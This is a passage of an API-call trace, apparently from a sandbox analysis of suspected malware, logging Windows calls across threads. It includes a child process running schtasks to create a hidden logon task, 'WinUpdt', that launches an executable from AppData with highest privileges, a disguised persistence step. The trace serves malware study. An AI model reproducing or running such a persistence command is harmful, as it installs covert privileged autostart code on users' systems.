hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.768] GetLastError () returned 0x0 [0053.768] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0053.768] GetLastError () returned 0x0 [0053.769] CloseHandle (hObject=0x83) returned 1 [0053.769] GetLastError () returned 0x0 [0053.772] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0053.772] GetLastError () returned 0x0 [0053.772] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5c8ea5c | out: lpConsoleScreenBufferInfo=0x5c8ea5c) returned 1 [0053.773] GetLastError () returned 0x0 [0053.773] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0053.773] GetLastError () returned 0x0 [0053.773] CloseHandle (hObject=0x83) returned 1 [0053.773] GetLastError () returned 0x0 [0053.773] WriteFile (in: hFile=0x360, lpBuffer=0x3169fdc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5c8eaa4, lpOverlapped=0x0 | out: lpBuffer=0x3169fdc*, lpNumberOfBytesWritten=0x5c8eaa4*=0x1, lpOverlapped=0x0) returned 1 [0053.774] GetLastError () returned 0x0 [0053.779] SetEvent (hEvent=0x3a0) returned 1 [0053.779] GetLastError () returned 0x0 [0053.779] SetEvent (hEvent=0x3b8) returned 1 [0053.779] GetLastError () returned 0x0 [0053.779] SetEvent (hEvent=0x3bc) returned 1 [0053.779] GetLastError () returned 0x0 [0053.779] SetEvent (hEvent=0x3dc) returned 1 [0053.780] GetLastError () returned 0x0 [0053.780] SetEvent (hEvent=0x32c) returned 1 [0053.780] GetLastError () returned 0x0 [0053.780] SetEvent (hEvent=0x3c4) returned 1 [0053.780] GetLastError () returned 0x0 [0053.780] SetEvent (hEvent=0x3c8) returned 1 [0053.780] GetLastError () returned 0x0 [0053.780] SetEvent (hEvent=0x328) returned 1 [0053.780] GetLastError () returned 0x0 [0053.780] SetEvent (hEvent=0x3cc) returned 1 [0053.780] GetLastError () returned 0x0 [0053.780] CoUninitialize () Thread: id = 84 os_tid = 0x544 [0053.813] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0053.835] SetThreadUILanguage (LangId=0x0) returned 0x409 [0053.837] VirtualQuery (in: lpAddress=0x69de2c0, lpBuffer=0x69df2c0, dwLength=0x1c | out: lpBuffer=0x69df2c0*(BaseAddress=0x69de000, AllocationBase=0x6050000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.837] VirtualQuery (in: lpAddress=0x69de3dc, lpBuffer=0x69df3dc, dwLength=0x1c | out: lpBuffer=0x69df3dc*(BaseAddress=0x69de000, AllocationBase=0x6050000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.841] SetEvent (hEvent=0x39c) returned 1 [0053.841] GetLastError () returned 0x0 [0053.841] SetEvent (hEvent=0x3d4) returned 1 [0053.841] GetLastError () returned 0x0 [0053.841] SetEvent (hEvent=0x3e4) returned 1 [0053.841] GetLastError () returned 0x0 [0053.841] SetEvent (hEvent=0x39c) returned 1 [0053.841] GetLastError () returned 0x0 [0053.841] SetEvent (hEvent=0x3d4) returned 1 [0053.841] GetLastError () returned 0x0 [0053.841] SetEvent (hEvent=0x3f4) returned 1 [0053.841] GetLastError () returned 0x0 [0053.841] SetEvent (hEvent=0x3e8) returned 1 [0053.841] GetLastError () returned 0x0 [0053.841] SetEvent (hEvent=0x3ec) returned 1 [0053.841] GetLastError () returned 0x0 [0053.841] SetEvent (hEvent=0x3f0) returned 1 [0053.841] GetLastError () returned 0x0 [0053.841] SetEvent (hEvent=0x3f8) returned 1 [0053.841] GetLastError () returned 0x0 [0053.842] CoUninitialize () Process: id = "6" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x6c326000" os_pid = "0x864" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x8e8" cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /create /f /sc ONLOGON /RL HIGHEST /tn \"'WinUpdt\"' /tr \"'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe\"'" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 96 os_tid = 0x874 [0067.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29f8fc | out: lpSystemTimeAsFileTime=0x29f8fc*(dwLowDateTime=0x8be0ca0, dwHighDateTime=0x1d5fc36)) [0067.626] GetCurrentProcessId () returned 0x864 [0067.626] GetCurrentThreadId () returned 0x874 [0067.626] GetTickCount () returned 0x114a304 [0067.626] RtlQueryPerformanceCounter () returned 0x1 [0067.627] GetModuleHandleA (lpModuleName=0x0) returned 0x510000 [0067.627] __set_app_type (_Type=0x1) [0067.627] __p__fmode () returned 0x770331f4 [0067.627] __p__commode () returned 0x770331fc [0067.627] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x527881) returned 0x0 [0067.627] __wgetmainargs (in: _Argc=0x539e6c, _Argv=0x539e74, _Env=0x539e70, _DoWildCard=0, _StartInfo=0x539e80 | out: _Argc=0x539e6c, _Argv=0x539e74, _Env=0x539e70) returned 0 [0067.628] _onexit (_Func=0x530fe2) returned 0x530fe2 [0067.628] _onexit (_Func=0x530ff3) returned 0x530ff3 [0067.628] _onexit (_Func=0x531002) returned 0x531002 [0067.628] _onexit (_Func=0x53101e) returned 0x53101e [0067.628] _onexit (_Func=0x53103a) returned 0x53103a [0067.628] _onexit (_Func=0x531056) returned 0x531056 [0067.628] _onexit (_Func=0x531072) returned 0x531072 [0067.628] _onexit (_Func=0x53108e) returned 0x53108e [0067.628] _onexit (_Func=0x5310aa) returned 0x5310aa [0067.628] _onexit (_Func=0x5310c6) returned 0x5310c6 [0067.629] _onexit (_Func=0x5310e2) returned 0x5310e2 [0067.629] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.629] WinSqmIsOptedIn () returned 0x0 [0067.629] GetProcessHeap () returned 0x660000 [0067.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674b88 [0067.629] SetLastError (dwErrCode=0x0) [0067.629] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0067.629] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0067.629] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0067.629] VerifyVersionInfoW (in: lpVersionInformation=0x29f374, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x29f374) returned 1 [0067.629] GetProcessHeap () returned 0x660000 [0067.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674ba0 [0067.629] lstrlenW (lpString="") returned 0 [0067.629] GetProcessHeap () returned 0x660000 [0067.629] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x2) returned 0x674f70 [0067.629] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x674f80 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674bb8 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x674fa0 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x674fc0 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x674fe0 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675000 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674bd0 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675020 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675040 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675060 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675080 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674be8 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6750a0 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6750d8 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6750f8 [0067.630] GetProcessHeap () returned 0x660000 [0067.630] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675118 [0067.630] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.669] SetLastError (dwErrCode=0x0) [0067.669] GetProcessHeap () returned 0x660000 [0067.669] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675138 [0067.669] GetProcessHeap () returned 0x660000 [0067.670] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675158 [0067.670] GetProcessHeap () returned 0x660000 [0067.670] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675178 [0067.670] GetProcessHeap () returned 0x660000 [0067.670] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675198 [0067.670] GetProcessHeap () returned 0x660000 [0067.670] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6751b8 [0067.670] GetProcessHeap () returned 0x660000 [0067.670] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674c00 [0067.670] _memicmp (_Buf1=0x674c00, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.670] GetProcessHeap () returned 0x660000 [0067.670] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x208) returned 0x675a40 [0067.670] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x675a40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0067.670] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x755a0000 [0067.677] GetProcAddress (hModule=0x755a0000, lpProcName="GetFileVersionInfoSizeW") returned 0x755a19d9 [0067.678] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0067.678] GetProcessHeap () returned 0x660000 [0067.678] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x74e) returned 0x675c50 [0067.678] GetProcAddress (hModule=0x755a0000, lpProcName="GetFileVersionInfoW") returned 0x755a19f4 [0067.678] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x675c50 | out: lpData=0x675c50) returned 1 [0067.678] GetProcAddress (hModule=0x755a0000, lpProcName="VerQueryValueW") returned 0x755a1b51 [0067.678] VerQueryValueW (in: pBlock=0x675c50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29f47c, puLen=0x29f480 | out: lplpBuffer=0x29f47c*=0x675fec, puLen=0x29f480) returned 1 [0067.679] _memicmp (_Buf1=0x674c00, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.679] _vsnwprintf (in: _Buffer=0x675a40, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x29f464 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0067.680] VerQueryValueW (in: pBlock=0x675c50, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x29f48c, puLen=0x29f488 | out: lplpBuffer=0x29f48c*=0x675e18, puLen=0x29f488) returned 1 [0067.680] lstrlenW (lpString="schtasks.exe") returned 12 [0067.680] lstrlenW (lpString="schtasks.exe") returned 12 [0067.680] lstrlenW (lpString=".EXE") returned 4 [0067.680] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0067.680] lstrlenW (lpString="schtasks.exe") returned 12 [0067.680] lstrlenW (lpString=".EXE") returned 4 [0067.680] _memicmp (_Buf1=0x674c00, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.680] lstrlenW (lpString="schtasks") returned 8 [0067.680] GetProcessHeap () returned 0x660000 [0067.680] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6751f8 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675218 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675238 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675258 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674c60 [0067.681] _memicmp (_Buf1=0x674c60, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0xa0) returned 0x676630 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675278 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675298 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6752b8 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674c78 [0067.681] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x200) returned 0x6766d8 [0067.681] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0067.681] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x30) returned 0x6768e0 [0067.681] _vsnwprintf (in: _Buffer=0x676630, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x29f468 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675c50) returned 1 [0067.681] GetProcessHeap () returned 0x660000 [0067.681] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675c50) returned 0x74e [0067.682] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675c50 | out: hHeap=0x660000) returned 1 [0067.682] SetLastError (dwErrCode=0x0) [0067.682] GetThreadLocale () returned 0x409 [0067.682] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.682] lstrlenW (lpString="?") returned 1 [0067.682] GetThreadLocale () returned 0x409 [0067.682] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.682] lstrlenW (lpString="create") returned 6 [0067.682] GetThreadLocale () returned 0x409 [0067.682] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.682] lstrlenW (lpString="delete") returned 6 [0067.682] GetThreadLocale () returned 0x409 [0067.682] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.682] lstrlenW (lpString="query") returned 5 [0067.682] GetThreadLocale () returned 0x409 [0067.682] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.682] lstrlenW (lpString="change") returned 6 [0067.682] GetThreadLocale () returned 0x409 [0067.682] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.682] lstrlenW (lpString="run") returned 3 [0067.682] GetThreadLocale () returned 0x409 [0067.682] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.682] lstrlenW (lpString="end") returned 3 [0067.682] GetThreadLocale () returned 0x409 [0067.682] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.682] lstrlenW (lpString="showsid") returned 7 [0067.682] GetThreadLocale () returned 0x409 [0067.682] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.682] SetLastError (dwErrCode=0x0) [0067.682] SetLastError (dwErrCode=0x0) [0067.682] lstrlenW (lpString="/create") returned 7 [0067.682] lstrlenW (lpString="-/") returned 2 [0067.682] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.682] lstrlenW (lpString="?") returned 1 [0067.682] lstrlenW (lpString="?") returned 1 [0067.682] GetProcessHeap () returned 0x660000 [0067.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674c90 [0067.682] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.682] GetProcessHeap () returned 0x660000 [0067.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0xa) returned 0x674ca8 [0067.683] lstrlenW (lpString="create") returned 6 [0067.683] GetProcessHeap () returned 0x660000 [0067.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674cc0 [0067.683] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.683] GetProcessHeap () returned 0x660000 [0067.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6752d8 [0067.683] _vsnwprintf (in: _Buffer=0x674ca8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|?|") returned 3 [0067.683] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|create|") returned 8 [0067.683] lstrlenW (lpString="|?|") returned 3 [0067.683] lstrlenW (lpString="|create|") returned 8 [0067.683] SetLastError (dwErrCode=0x490) [0067.683] lstrlenW (lpString="create") returned 6 [0067.683] lstrlenW (lpString="create") returned 6 [0067.683] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.683] GetProcessHeap () returned 0x660000 [0067.683] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674ca8) returned 1 [0067.683] GetProcessHeap () returned 0x660000 [0067.683] RtlReAllocateHeap (Heap=0x660000, Flags=0xc, Ptr=0x674ca8, Size=0x14) returned 0x6752f8 [0067.683] lstrlenW (lpString="create") returned 6 [0067.683] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.683] _vsnwprintf (in: _Buffer=0x6752f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|create|") returned 8 [0067.683] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|create|") returned 8 [0067.683] lstrlenW (lpString="|create|") returned 8 [0067.683] lstrlenW (lpString="|create|") returned 8 [0067.683] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0067.683] SetLastError (dwErrCode=0x0) [0067.683] SetLastError (dwErrCode=0x0) [0067.683] SetLastError (dwErrCode=0x0) [0067.683] lstrlenW (lpString="/f") returned 2 [0067.683] lstrlenW (lpString="-/") returned 2 [0067.683] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.683] lstrlenW (lpString="?") returned 1 [0067.683] lstrlenW (lpString="?") returned 1 [0067.683] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.683] lstrlenW (lpString="f") returned 1 [0067.683] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.684] _vsnwprintf (in: _Buffer=0x6752f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|?|") returned 3 [0067.684] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|f|") returned 3 [0067.684] lstrlenW (lpString="|?|") returned 3 [0067.684] lstrlenW (lpString="|f|") returned 3 [0067.684] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0 [0067.684] SetLastError (dwErrCode=0x490) [0067.684] lstrlenW (lpString="create") returned 6 [0067.684] lstrlenW (lpString="create") returned 6 [0067.684] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.684] lstrlenW (lpString="f") returned 1 [0067.684] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.684] _vsnwprintf (in: _Buffer=0x6752f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|create|") returned 8 [0067.684] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|f|") returned 3 [0067.684] lstrlenW (lpString="|create|") returned 8 [0067.684] lstrlenW (lpString="|f|") returned 3 [0067.684] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0 [0067.684] SetLastError (dwErrCode=0x490) [0067.684] lstrlenW (lpString="delete") returned 6 [0067.684] lstrlenW (lpString="delete") returned 6 [0067.684] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.684] lstrlenW (lpString="f") returned 1 [0067.684] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.684] _vsnwprintf (in: _Buffer=0x6752f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|delete|") returned 8 [0067.684] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|f|") returned 3 [0067.684] lstrlenW (lpString="|delete|") returned 8 [0067.684] lstrlenW (lpString="|f|") returned 3 [0067.684] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0 [0067.684] SetLastError (dwErrCode=0x490) [0067.684] lstrlenW (lpString="query") returned 5 [0067.684] lstrlenW (lpString="query") returned 5 [0067.684] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.684] lstrlenW (lpString="f") returned 1 [0067.684] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.684] _vsnwprintf (in: _Buffer=0x6752f8, _BufferCount=0x8, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|query|") returned 7 [0067.684] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|f|") returned 3 [0067.684] lstrlenW (lpString="|query|") returned 7 [0067.685] lstrlenW (lpString="|f|") returned 3 [0067.685] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0 [0067.685] SetLastError (dwErrCode=0x490) [0067.685] lstrlenW (lpString="change") returned 6 [0067.685] lstrlenW (lpString="change") returned 6 [0067.687] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.687] lstrlenW (lpString="f") returned 1 [0067.687] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.687] _vsnwprintf (in: _Buffer=0x6752f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|change|") returned 8 [0067.687] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|f|") returned 3 [0067.687] lstrlenW (lpString="|change|") returned 8 [0067.687] lstrlenW (lpString="|f|") returned 3 [0067.687] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0 [0067.687] SetLastError (dwErrCode=0x490) [0067.687] lstrlenW (lpString="run") returned 3 [0067.687] lstrlenW (lpString="run") returned 3 [0067.687] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.687] lstrlenW (lpString="f") returned 1 [0067.687] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.687] _vsnwprintf (in: _Buffer=0x6752f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|run|") returned 5 [0067.687] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|f|") returned 3 [0067.687] lstrlenW (lpString="|run|") returned 5 [0067.687] lstrlenW (lpString="|f|") returned 3 [0067.687] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0 [0067.687] SetLastError (dwErrCode=0x490) [0067.687] lstrlenW (lpString="end") returned 3 [0067.687] lstrlenW (lpString="end") returned 3 [0067.687] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.687] lstrlenW (lpString="f") returned 1 [0067.687] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.687] _vsnwprintf (in: _Buffer=0x6752f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|end|") returned 5 [0067.687] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|f|") returned 3 [0067.687] lstrlenW (lpString="|end|") returned 5 [0067.687] lstrlenW (lpString="|f|") returned 3 [0067.687] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0 [0067.688] SetLastError (dwErrCode=0x490) [0067.688] lstrlenW (lpString="showsid") returned 7 [0067.688] lstrlenW (lpString="showsid") returned 7 [0067.688] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.688] GetProcessHeap () returned 0x660000 [0067.688] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6752f8) returned 1 [0067.688] GetProcessHeap () returned 0x660000 [0067.688] RtlReAllocateHeap (Heap=0x660000, Flags=0xc, Ptr=0x6752f8, Size=0x16) returned 0x675318 [0067.688] lstrlenW (lpString="f") returned 1 [0067.688] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.688] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0xa, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|showsid|") returned 9 [0067.688] _vsnwprintf (in: _Buffer=0x6752d8, 